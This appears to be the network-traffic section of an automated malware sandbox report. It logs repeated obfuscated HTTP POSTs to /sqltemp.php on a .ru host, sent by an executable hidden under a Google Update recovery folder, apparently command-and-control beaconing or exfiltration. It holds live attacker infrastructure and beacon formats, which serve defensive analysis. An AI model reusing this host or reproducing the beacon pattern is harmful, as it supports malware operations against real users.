                                                                                                                  Expect: 100-continue
                                                                                                                  Jan 1, 2025 16:02:22.022550106 CET1124OUTData Raw: 56 50 5a 54 54 59 54 55 58 56 52 59 56 51 59 51 5b 52 54 5f 55 5e 50 5e 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: VPZTTYTUXVRYVQYQ[RT_U^P^Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.[&/%]7<-\$.'8:273+)?T='#*+)1,#-&Y.,Y-
                                                                                                                  Jan 1, 2025 16:02:22.110033035 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:02:22.368505001 CET807INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:02:22 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=E3%2BudHspWeH4H8dUk83z1qcr5jhn6ZcyAN1b6BCl8o%2FgPjcCPL1grklnMDXhRlyj8ukTjpR5mqPWo%2BKdva6GZBW0aa5HzXUeKJCMcMbj9I2w0MCNgkwFzI93gzWEhaLhGZqoAre%2F"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb363d3eaff8ce0-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2663&min_rtt=1906&rtt_var=2230&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1402&delivery_rate=183209&cwnd=210&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0
                                                                                                                  Jan 1, 2025 16:02:22.376399994 CET278OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1964
                                                                                                                  Expect: 100-continue
                                                                                                                  Jan 1, 2025 16:02:22.472697973 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:02:22.473480940 CET1964OUTData Raw: 53 54 5a 51 54 59 54 57 58 56 52 59 56 5e 59 54 5b 5f 54 59 55 5b 50 5c 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: STZQTYTWXVRYV^YT[_TYU[P\Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.$/]4Y>'/92!-<:(*.+!2+52?:&Y.,Y-
                                                                                                                  Jan 1, 2025 16:02:22.773247004 CET951INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:02:22 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hzzDt1CPwyhXgWBGZiDMzHEzPggi0CPe6VdB5ths0TH02KhigYM1pjW5jMHlVpuiUpcsjNQ9fkkuSbevkC5vDvjaacttKo9zoxRlQ1fXhui4K8f2o7VYqua3HM53agx9rEVL8WLF"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb363d62d6e8ce0-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=5272&min_rtt=1906&rtt_var=6778&sent=9&recv=11&lost=0&retrans=0&sent_bytes=857&recv_bytes=3644&delivery_rate=1487519&cwnd=213&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 39 38 0d 0a 00 1f 26 08 3d 3d 3d 0d 25 0c 27 00 28 04 30 0e 32 2e 29 00 28 38 31 06 33 3d 2f 58 29 3a 2c 01 36 3c 0f 5f 26 5e 24 59 37 13 09 12 33 34 2b 59 05 1c 20 08 35 01 02 59 2a 03 3b 59 26 11 31 13 33 3e 3f 07 2a 28 0d 0f 23 28 23 5b 26 2d 37 05 3e 39 23 0c 26 3c 34 03 2e 59 21 1d 33 3a 2c 54 00 11 25 0d 27 0f 23 04 23 27 28 5b 21 31 18 01 26 37 36 1b 25 3c 0d 54 20 2a 31 05 25 32 30 00 21 1d 22 11 26 05 26 04 23 2e 2f 55 2a 14 25 53 20 02 2d 48 05 3f 57 53 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 98&===%'(02.)(813=/X):,6<_&^$Y734+Y 5Y*;Y&13>?*(#(#[&-7>9#&<4.Y!3:,T%'##'([!1&76%<T *1%20!"&&#./U*%S -H?WS0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  10192.168.2.662443104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:02:22.524871111 CET278OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Jan 1, 2025 16:02:22.875992060 CET1124OUTData Raw: 56 55 5f 5c 54 5c 51 51 58 56 52 59 56 50 59 5e 5b 5e 54 5f 55 5a 50 5c 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: VU_\T\QQXVRYVPY^[^T_UZP\Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.Y$<9] /$8V4.0[()+V)X<!2?Y?+"2?U-:&Y.,Y-
                                                                                                                  Jan 1, 2025 16:02:22.989694118 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:02:23.305875063 CET807INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:02:23 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6bT1d7RuvHI7eXFH7yyeNlbYDrUFTi9dNSQf3Pj7uslI6JVmeu7jseCYZepW%2FoLwzm6crjvNzCjVWTO5fcmiyPNMwCwM0zm1EEdSVQ8HqzJnO%2B%2BT%2FkKsnU3peRZgvV1mV5KbqQpt"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb363d9692a4393-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=8054&min_rtt=1758&rtt_var=13252&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1402&delivery_rate=28006&cwnd=200&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  11192.168.2.662451104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:02:23.428395033 CET278OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Jan 1, 2025 16:02:23.785437107 CET1124OUTData Raw: 56 5f 5f 50 54 5c 51 55 58 56 52 59 56 5c 59 52 5b 5c 54 5f 55 5e 50 5a 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: V__PT\QUXVRYV\YR[\T_U^PZZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.$&4=_3#/\140[(S)$Z41+*8)B$/V.&Y.,Y-5
                                                                                                                  Jan 1, 2025 16:02:23.870918989 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:02:24.158406973 CET809INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:02:24 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QTPEHslymt9g9vdDd5RvUQWJyfbkF0hNGtg%2FQJUpdYB%2FpTO00%2BkWyQ7pCpYpy80Qht0l6YMdDr9wqTjRCWXfQde5PZQVm%2BBhRnBb970kDzHj6rU8jFEN%2FerUWwNqFnwVO80YVtBc"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb363dee929f791-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2308&min_rtt=1524&rtt_var=2139&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1402&delivery_rate=187251&cwnd=146&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  12192.168.2.662458104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:02:24.306349993 CET278OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Jan 1, 2025 16:02:24.657216072 CET1124OUTData Raw: 53 54 5f 54 54 58 51 50 58 56 52 59 56 5b 59 55 5b 5e 54 59 55 5a 50 58 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: ST_TTXQPXVRYV[YU[^TYUZPXZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S-&<5 10.,)!U >8_?*><\#'](62:&Y.,Y-)
                                                                                                                  Jan 1, 2025 16:02:24.761190891 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:02:24.974467993 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:02:25.018347979 CET804INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:02:24 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vP59QyCWzAjqLUZTbbqXI2euXlbIM7HofppWPd24rXGvB8zsL4UTQwcproqmD13dzLXYl5u5yrLcNxA9PB7D%2Bju%2Bazcj1mWFCFFQpPa82nFtr%2BVfdfWhxjGgxsiLayY3FjjVFGwD"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb363e479304213-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4291&min_rtt=2422&rtt_var=4646&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1402&delivery_rate=84028&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  13192.168.2.662464104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:02:25.149293900 CET302OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:02:25.500757933 CET1124OUTData Raw: 53 52 5a 57 51 58 51 51 58 56 52 59 56 50 59 54 5b 53 54 5c 55 5d 50 55 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: SRZWQXQQXVRYVPYT[ST\U]PUZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.Y&/)[713;C89S 0**8=(Y73(C%4.&Y.,Y-
                                                                                                                  Jan 1, 2025 16:02:25.624682903 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:02:25.881412983 CET812INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:02:25 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RGr6IQoPR%2FTNb1USl%2Fu7ZuWQZf9o0yN1lSUmvHyeYhygfvfaz4PWFoRm%2FyML0Fo9%2FHxsiK26P5G%2B0E4FuocaqoRECNyWrO7coMfhL%2BhWG21YVFWfWwyz%2BB4w7EsYTm5u37KzSewD"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb363e9cf0943c8-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4348&min_rtt=1753&rtt_var=5848&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=64837&cwnd=191&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  14192.168.2.662469104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:02:26.008424997 CET302OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:02:26.373981953 CET1124OUTData Raw: 56 50 5f 5d 54 59 54 51 58 56 52 59 56 5c 59 53 5b 5b 54 5f 55 59 50 5f 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: VP_]TYTQXVRYV\YS[[T_UYP_Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.^&,!#?=\'X$,"4.<+*><X #Y(&1?;-*&Y.,Y-5
                                                                                                                  Jan 1, 2025 16:02:26.473244905 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:02:26.740102053 CET806INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:02:26 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lBQlDTg0LgWMB0PFBE3xcxXlnqa92VKbrYMHwHSYyh7%2Byq7RbwWdMzh91ldiEUya6DVO%2F4Cbsd%2FLxOLjg6OOM6OjmsPNy39XnnL7syl0f3VO9%2FzjCaj9TgDn590U7k8VSkeVprrU"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb363ef2fe443e9-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4808&min_rtt=1799&rtt_var=6692&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=56433&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  15192.168.2.662475104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:02:26.874149084 CET302OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:02:27.219669104 CET1124OUTData Raw: 56 52 5f 5c 54 50 54 53 58 56 52 59 56 58 59 56 5b 5c 54 5f 55 5c 50 5a 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: VR_\TPTSXVRYVXYV[\T_U\PZZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.['/!X#%]3C/%V7=,_?90) (?)@&/?U-:&Y.,Y-%
                                                                                                                  Jan 1, 2025 16:02:27.317828894 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:02:27.593163967 CET804INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:02:27 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VFkPCLZC69uCuURuVMwgHCJTv0NKKW4zpUIgcfqvPfajhoEE98R%2FV5N7LL5WccOkt%2F3Cayk4xgGZmidOmHNceOKd2GkOwt%2BiIOsN46uHUe54Mok0VLsbk8S02mU5KAxO5gU5kJQf"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb363f47ddc7298-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4415&min_rtt=2000&rtt_var=5580&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=68470&cwnd=172&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  16192.168.2.662483104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:02:27.736412048 CET302OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  17192.168.2.662484104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:02:27.793709993 CET302OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1964
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:02:28.141597033 CET1964OUTData Raw: 56 54 5f 5d 51 5d 54 52 58 56 52 59 56 5e 59 5f 5b 5a 54 51 55 54 50 59 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: VT_]Q]TRXVRYV^Y_[ZTQUTPYZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.Y'/:7<&$-$,*9T#=(+)'S=$ 2,(+.$/'R-:&Y.,Y-
                                                                                                                  Jan 1, 2025 16:02:28.238744020 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:02:28.421642065 CET949INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:02:28 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xhYboT85B3Fp8r3n5WDw0GWXGlB35vSRWmGxPgBBNoK0CljVFyU8RN09jrpETLohGC81Latt8jEMvb2s3vLKRfjVeGz%2FoPl9pZ3JkvbiDSCW17hOlPJekkFcJZAxAfIFpgJW2gGP"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb363fa3ada43ab-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4760&min_rtt=2240&rtt_var=5880&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2266&delivery_rate=65178&cwnd=220&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
